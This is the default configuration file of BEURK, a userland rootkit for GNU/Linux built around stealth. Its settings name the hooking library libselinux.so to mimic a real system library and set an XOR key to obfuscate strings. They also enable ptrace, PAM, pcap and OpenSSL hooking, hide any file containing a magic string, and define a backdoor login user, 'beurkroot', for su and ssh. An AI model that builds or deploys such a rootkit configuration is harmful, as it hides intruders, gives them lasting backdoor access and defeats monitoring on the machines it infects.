# BEURK is an userland rootkit for GNU/Linux, focused around stealth.
# -> Default Configuration File
#
# vi: ft=conf

# str: name of the generated evil hooking library
LIBRARY_NAME = libselinux.so

# str: compiler to use while building BEURK
CC = gcc

# hexbyte: the XOR key to use for obfuscated strings
XOR_KEY = 0xfe

# int: set DEBUG_LEVEL to 1 or 2 (0 to disable)
DEBUG_LEVEL = 0

# hidden_literal: set debug file destination
DEBUG_FILE = /dev/stderr

# bool: enable or disable Ptrace Hooking (see API Docs)
ENABLE_PTRACE = true

# bool: enable or disable libpam related features
ENABLE_PAM = true

# bool: enable or disable libpcap related features
ENABLE_PCAP = true

# bool: enable or disable openssl related features
ENABLE_SSL = true

# hidden_literal: hide files with this string in the name
MAGIC_STRING = _BEURK_

# hidden_literal: PAM username (for su / ssh login)
PAM_USER = beurkroot
